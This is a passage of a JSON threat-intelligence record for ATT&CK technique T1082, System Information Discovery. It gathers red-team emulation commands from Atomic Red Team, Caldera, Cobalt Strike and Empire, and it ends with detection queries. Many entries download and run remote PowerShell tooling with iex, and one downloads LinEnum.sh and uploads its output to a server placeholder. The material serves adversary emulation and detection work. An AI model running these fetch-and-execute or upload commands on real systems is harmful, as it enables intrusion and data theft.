net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\notherchecks -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGeneralrecon -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMorerecon -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nRBCD-Check -consoleoutput -noninteractive", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')\nInvoke-watson", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')\nInvoke-SharpUp -command \"audit\"", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", + "$PSVersionTable\n", + "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n", + "wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n", + "[environment]::OSVersion.Version\n", + "powershell/situational_awareness/host/computerdetails", + "powershell/situational_awareness/host/winenum", + "powershell/situational_awareness/network/powerview/get_computer" + ], + "commands": [ + { + "command": "ver", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell ver", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "set", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell set", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "get_env.rb", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net config workstation\nnet config server", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net config workstation\nshell net config server", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "systeminfo [/s COMPNAME] [/u DOMAIN\\user] [/p password]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "systemprofiler tool if no access yet (victim browses to website)\nor\nshell systeminfo (if you already have a beacon)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "sysinfo, run winenum, get_env.rb", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "system_profiler\nls -al /Applications\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi;\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi; \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi;\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi;\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi;\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi;\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi;\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi;\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi;\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i \"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i \"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "hostname\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "cscript PathToAtomicsFolder\\T1082\\src\\griffon_recon.vbs", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "set\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "env\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "csrutil status\n", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwinPEAS -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nitm4nprivesc -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\noldchecks -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\notherchecks -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGeneralrecon -consoleoutput -noninteractive", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMorerecon -noninteractive -consoleoutput", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nRBCD-Check -consoleoutput -noninteractive", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')\nInvoke-watson", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')\nInvoke-SharpUp -command \"audit\"", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", + "source": "atomics/T1082/T1082.yaml", + "name": "Atomic Red Team Test - System Information Discovery" + }, + { + "command": "$PSVersionTable\n", + "source": "data/abilities/discovery/29451844-9b76-4e16-a9ee-d6feab4b24db.yml", + "name": "Discover the PowerShell version" + }, + { + "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n", + "source": "data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml", + "name": "Discover all directories containing deletable files by user" + }, + { + "command": "wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n", + "source": "data/abilities/discovery/46098c66-8d9a-4d23-8a95-dd5021c385ae.yml", + "name": "Download and execute LinEnum.sh" + }, + { + "command": "[environment]::OSVersion.Version\n", + "source": "data/abilities/discovery/b6b105b9-41dc-490b-bc5c-80d699b82ce8.yml", + "name": "Find OS Version" + }, + { + "command": "powershell/situational_awareness/host/computerdetails", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/host/winenum", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_computer", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1082", + "Built-in Windows Command": "ver", + "Cobalt Strike": "shell ver", + "Metasploit": "", + "Description": "Get the Windows OS version that's running" + }, + { + "Category": "T1082", + "Built-in Windows Command": "set", + "Cobalt Strike": "shell set", + "Metasploit": "get_env.rb", + "Description": "Print all of the environment variables" + }, + { + "Category": "T1082", + "Built-in Windows Command": "net config workstation\nnet config server", + "Cobalt Strike": "shell net config workstation\nshell net config server", + "Metasploit": "", + "Description": "Get computer name, username, OS software version, domain information, DNS, logon domain" + }, + { + "Category": "T1082", + "Built-in Windows Command": "systeminfo [/s COMPNAME] [/u DOMAIN\\user] [/p password]", + "Cobalt Strike": "systemprofiler tool if no access yet (victim browses to website)\nor\nshell systeminfo (if you already have a beacon)", + "Metasploit": "sysinfo, run winenum, get_env.rb", + "Description": "Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties, such as RAM, disk space, and network cards" + }, + { + "attack_technique": "T1082", + "display_name": "System Information Discovery", + "atomic_tests": [ + { + "name": "System Information Discovery", + "auto_generated_guid": "66703791-c902-4560-8770-42b8a91f7667", + "description": "Identify System Info. Upon execution, system info and time info will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", + "name": "command_prompt" + } + }, + { + "name": "System Information Discovery", + "auto_generated_guid": "edff98ec-0f73-4f63-9890-6b117092aff6", + "description": "Identify System Info\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "system_profiler\nls -al /Applications\n", + "name": "sh" + } + }, + { + "name": "List OS Information", + "auto_generated_guid": "cccb070c-df86-4216-a5bc-9fb60c74e27c", + "description": "Identify System Info\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "output_file": { + "description": "Output file used to store the results.", + "type": "Path", + "default": "/tmp/T1082.txt" + } + }, + "executor": { + "command": "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> #{output_file}; fi;\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> #{output_file}; fi; \nif [ -f /etc/issue ]; then cat /etc/issue >> #{output_file}; fi;\nuptime >> #{output_file}\ncat #{output_file} 2>/dev/null\n", + "cleanup_command": "rm #{output_file} 2>/dev/null\n", + "name": "sh" + } + }, + { + "name": "Linux VM Check via Hardware", + "auto_generated_guid": "31dad7ad-2286-4c02-ae92-274418c85fec", + "description": "Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi;\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi;\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi;\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi;\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi;\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi;\n", + "name": "bash" + } + }, + { + "name": "Linux VM Check via Kernel Modules", + "auto_generated_guid": "8057d484-0fae-49a4-8302-4812c4f1e64e", + "description": "Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i \"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i \"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "name": "bash" + } + }, + { + "name": "Hostname Discovery (Windows)", + "auto_generated_guid": "85cfbf23-4a1e-4342-8792-007e004b975f", + "description": "Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "hostname\n", + "name": "command_prompt" + } + }, + { + "name": "Hostname Discovery", + "auto_generated_guid": "486e88ea-4f56-470f-9b57-3f4d73f39133", + "description": "Identify system hostname for Linux and macOS systems.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "executor": { + "command": "hostname\n", + "name": "bash" + } + }, + { + "name": "Windows MachineGUID Discovery", + "auto_generated_guid": "224b4daf-db44-404e-b6b2-f4d1f0126ef8", + "description": "Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", + "name": "command_prompt" + } + }, + { + "name": "Griffon Recon", + "auto_generated_guid": "69bd4abe-8759-49a6-8d21-0f15822d6370", + "description": "This script emulates the reconnaissance script seen in used by Griffon and was modified by security researcher Kirk Sayre \nin order simply print the recon results to the screen as opposed to exfiltrating them. [Script](https://gist.github.com/kirk-sayre-work/7cb5bf4e2c7c77fa5684ddc17053f1e5). \nFor more information see also [https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon](https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon) and [https://attack.mitre.org/software/S0417/](https://attack.mitre.org/software/S0417/)", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "vbscript": { + "description": "Path to sample script", + "type": "String", + "default": "PathToAtomicsFolder\\T1082\\src\\griffon_recon.vbs" + } + }, + "executor": { + "command": "cscript #{vbscript}", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Environment variables discovery on windows", + "auto_generated_guid": "f400d1c0-1804-4ff8-b069-ef5ddd2adbf3", + "description": "Identify all environment variables. Upon execution, environments variables and your path info will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "set\n", + "name": "command_prompt" + } + }, + { + "name": "Environment variables discovery on macos and linux", + "auto_generated_guid": "fcbdd43f-f4ad-42d5-98f3-0218097e2720", + "description": "Identify all environment variables. Upon execution, environments variables and your path info will be displayed.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "env\n", + "name": "sh" + } + }, + { + "name": "Show System Integrity Protection status (MacOS)", + "auto_generated_guid": "327cc050-9e99-4c8e-99b5-1d15f2fb6b96", + "description": "Read and Display System Intergrety Protection status. csrutil is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not.\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "csrutil status\n", + "name": "sh" + } + }, + { + "name": "WinPwn - winPEAS", + "auto_generated_guid": "eea1d918-825e-47dd-acc2-814d6c58c0e1", + "description": "Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwinPEAS -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - itm4nprivesc", + "auto_generated_guid": "3d256a2f-5e57-4003-8eb6-64d91b1da7ce", + "description": "Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nitm4nprivesc -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - Powersploits privesc checks", + "auto_generated_guid": "345cb8e4-d2de-4011-a580-619cf5a9e2d7", + "description": "Powersploits privesc checks using oldchecks function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\noldchecks -noninteractive -consoleoutput", + "cleanup_command": "rm -force -recurse .\\DomainRecon -ErrorAction Ignore\nrm -force -recurse .\\Exploitation -ErrorAction Ignore\nrm -force -recurse .\\LocalPrivEsc -ErrorAction Ignore\nrm -force -recurse .\\LocalRecon -ErrorAction Ignore\nrm -force -recurse .\\Vulnerabilities -ErrorAction Ignore", + "name": "powershell" + } + }, + { + "name": "WinPwn - General privesc checks", + "auto_generated_guid": "5b6f39a2-6ec7-4783-a5fd-2c54a55409ed", + "description": "General privesc checks using the otherchecks function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\notherchecks -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - GeneralRecon", + "auto_generated_guid": "7804659b-fdbf-4cf6-b06a-c03e758590e8", + "description": "Collect general computer informations via GeneralRecon function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGeneralrecon -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - Morerecon", + "auto_generated_guid": "3278b2f6-f733-4875-9ef4-bfed34244f0a", + "description": "Gathers local system information using the Morerecon function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nMorerecon -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - RBCD-Check", + "auto_generated_guid": "dec6a0d8-bcaf-4c22-9d48-2aee59fb692b", + "description": "Search for Resource-Based Constrained Delegation attack paths using RBCD-Check function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nRBCD-Check -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Watson searching for missing windows patches", + "auto_generated_guid": "07b18a66-6304-47d2-bad0-ef421eb2e107", + "description": "PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWatson.ps1')\nInvoke-watson", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors", + "auto_generated_guid": "efb79454-1101-4224-a4d0-30c9c8b29ffc", + "description": "PowerSharpPack - Sharpup checking common Privesc vectors technique via function of WinPwn - Takes several minutes to complete.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1')\nInvoke-SharpUp -command \"audit\"", + "name": "powershell" + } + }, + { + "name": "WinPwn - PowerSharpPack - Seatbelt", + "auto_generated_guid": "5c16ceb4-ba3a-43d7-b848-a13c1f216d95", + "description": "PowerSharpPack - Seatbelt technique via function of WinPwn.\n\n[Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey \"safety checks\" relevant from both offensive and defensive security perspectives.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')\nInvoke-Seatbelt -Command \"-group=all\"; pause", + "name": "powershell" + } + } + ] + }, + { + "id": "29451844-9b76-4e16-a9ee-d6feab4b24db", + "name": "PowerShell version", + "description": "Discover the PowerShell version", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "windows": { + "psh,pwsh": { + "command": "$PSVersionTable\n" + } + } + } + }, + { + "id": "30732a56-4a23-4307-9544-09caf2ed29d5", + "name": "Find deletable dirs (per user)", + "description": "Discover all directories containing deletable files by user", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n" + } + }, + "linux": { + "sh": { + "command": "find / -type d -user #{host.user.name} \\( -perm -g+w -or -perm -o+w \\) 2>/dev/null -exec ls -adl {} \\;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "id": "46098c66-8d9a-4d23-8a95-dd5021c385ae", + "name": "Linux Enumeration & Privilege Escalation Discovery Script", + "description": "Download and execute LinEnum.sh", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "linux": { + "sh": { + "command": "wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh;\nchmod +x LinEnum.sh;\n./LinEnum.sh > /tmp/exfil.txt;\ncurl -F 'data=@/tmp/exfil.txt' #{server}/file/upload ;\ncat /tmp/exfil.txt;\n", + "cleanup": "rm ./LinEnum.sh;\nrm /tmp/exfil.txt;\n" + } + } + } + }, + { + "id": "b6b105b9-41dc-490b-bc5c-80d699b82ce8", + "name": "Find OS Version", + "description": "Find OS Version", + "tactic": "discovery", + "technique": { + "attack_id": "T1082", + "name": "System Information Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "[environment]::OSVersion.Version\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/computerdetails", + "ATT&CK Technique #1": "T1082", + "ATT&CK Technique #2": "T1005", + "Technique": "System Information Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/computerdetails\": [\"T1082\",\"T1005\"]," + }, + { + "Empire Module": "powershell/situational_awareness/host/winenum", + "ATT&CK Technique #1": "T1082", + "ATT&CK Technique #2": "", + "Technique": "System Information Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/winenum\": [\"T1082\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_computer", + "ATT&CK Technique #1": "T1082", + "ATT&CK Technique #2": "", + "Technique": "System Information Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_computer\": [\"T1082\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains\"sysinfo.exe\"or process_path contains \"reg.exe\")and process_command_line contains \"reg*query HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\Disk\\\\Enum\"", + "name": "System Information Discovery" + } + ], + "possible_detections": [ + { + "title": "Reconnaissance Activity with Net Command", + "id": "2887e914-ce96-435f-8105-593937e90757", + "status": "experimental", + "description": "Detects a set of commands often used in recon stages by different attack groups", + "references": [ + "https://twitter.com/haroonmeer/status/939099379834658817", + "https://twitter.com/c_APT_ure/status/939475433711722497", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" + ], + "author": "Florian Roth, Markus Neis", + "date": "2018/08/22", + "modified": "2018/12/11", + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + 